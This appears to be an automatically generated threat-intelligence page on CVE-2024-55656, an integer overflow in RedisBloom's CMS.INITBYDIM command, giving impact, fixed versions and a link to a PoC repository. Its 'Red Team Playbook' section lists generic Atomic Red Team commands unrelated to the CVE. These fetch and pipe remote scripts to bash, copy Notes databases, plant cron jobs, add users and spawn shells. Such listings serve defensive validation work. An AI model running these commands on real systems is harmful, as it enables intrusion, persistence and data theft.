CVE-2024-55656
Overview
The vulnerability is an integer overflow in the RedisBloom module for Redis, specifically within the CMS.INITBYDIM command used to initialize a Count-Min Sketch data structure. The root cause is improper handling of width and depth parameters, causing memory allocation calculations to wrap around and allocate less heap memory than required. This flaw occurs during the execution of NewCMSketch(), the function responsible for memory allocation based on user-supplied dimensions, leading to out-of-bounds memory access potential.
Vulnerability Description
RedisBloom adds a set of probabilistic data structures to Redis. There is an integer overflow vulnerability in RedisBloom, which is a module used in Redis. The integer overflow vulnerability allows an attacker (a redis client which knows the password) to allocate memory in the heap lesser than the required memory due to wraparound. Then read and write can be performed beyond this allocated memory, leading to info leak and OOB write. The integer overflow is in CMS.INITBYDIM command, which initialize a Count-Min Sketch to dimensions specified by user. It accepts two values (width and depth) and uses them to allocate memory in NewCMSketch(). This vulnerability is fixed in 2.2.19, 2.4.12, 2.6.14, and 2.8.2.
Impact
An authenticated Redis client with knowledge of the password can exploit this vulnerability to read and write memory beyond allocated buffers, potentially leaking sensitive information or corrupting memory structures. This can lead to data exposure or destabilization of the Redis service. The attack requires network access and valid credentials (PR:L) but no user interaction, with high confidentiality, integrity, and availability impact as indicated by the CVSS vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H.
Solution
Users should upgrade RedisBloom to versions 2.2.19, 2.4.12, 2.6.14, or 2.8.2 or later, as these releases contain fixes for the integer overflow in CMS.INITBYDIM. Detailed patch instructions and advisory information are available in the RedisBloom GitHub security advisory GHSA-x5rx-rmq3-ff3h (https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h). No additional workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The integer overflow vulnerability present in the RedisBloom module poses significant risks due to its ability to manipulate memory allocation inappropriately. Specifically, this flaw arises during the execution of the CMS.INITBYDIM command, which is responsible for initializing a Count-Min Sketch data structure. The command accepts two parameters—width and depth—intended to define the dimensions of the data structure. However, due to improper handling of these inputs, an integer overflow can occur, leading to a situation where the allocated memory is less than what is actually required. This wraparound effect allows for the potential reading and writing of data beyond the allocated memory bounds, creating a pathway for exploitation.
Attackers can exploit this vulnerability by crafting specific requests to the RedisBloom module, particularly if they possess knowledge of the Redis instance's password. By manipulating the width and depth parameters, an attacker can trigger the integer overflow, resulting in memory allocation that does not meet the necessary requirements. This exploitation can lead to out-of-bounds (OOB) writes, where an attacker can overwrite adjacent memory locations. The consequences of such actions can range from leaking sensitive information to executing arbitrary code, depending on what resides in the overwritten memory space. This vulnerability thus opens up various attack vectors, including denial of service and unauthorized access to sensitive data.
In terms of real-world impact, the risks associated with this vulnerability are substantial. Organizations utilizing RedisBloom for data management could face severe repercussions if exploited. The potential for information leakage could compromise sensitive business data, customer information, or proprietary algorithms, leading to financial losses, reputational damage, and legal ramifications. Furthermore, the ability to execute arbitrary code could allow attackers to gain control over the Redis server, facilitating further attacks on the underlying infrastructure or connected systems. The high CVSS score of 8.8 indicates that this vulnerability is critical and should be prioritized for remediation.
To detect and mitigate this vulnerability, organizations should implement several strategies. First and foremost, upgrading to the patched versions of RedisBloom—specifically 2.2.19, 2.4.12, 2.6.14, or 2.8.2—is essential to eliminate the risk associated with this flaw. Regularly updating software components and maintaining a robust patch management policy can significantly reduce exposure to known vulnerabilities. Additionally, organizations should employ monitoring solutions that can detect unusual patterns of memory allocation or access attempts that deviate from normal operational behavior. Implementing network segmentation and access controls can also help limit the exposure of Redis instances to untrusted clients, thereby reducing the likelihood of exploitation.
In conclusion, the integer overflow vulnerability in the RedisBloom module represents a critical threat that can have far-reaching implications for organizations relying on this technology. Understanding the technical details, potential attack vectors, and real-world impacts is crucial for cybersecurity professionals tasked with safeguarding their environments. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk and protect their assets from potential exploitation.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
rick2600/redis-stack-CVE-2024-55656
|
rick2600 | 0 | 0 | 2025-05-20 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-92 | Forced Integer Overflow |
34%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}"
$fileExtensions = $fileExtensionsString -split ", "
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
Function Search-Files {
param (
[string]$directory
)
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
$fileExtensions -contains $_.Extension.ToLower()
}
return $files
}
$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
$foundFilePaths = $foundFiles.FullName
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
Write-Host "Zip file created: $outputZip\data.zip"
} else {
Write-Host "No files found with the specified extensions."
}
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-55656 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h |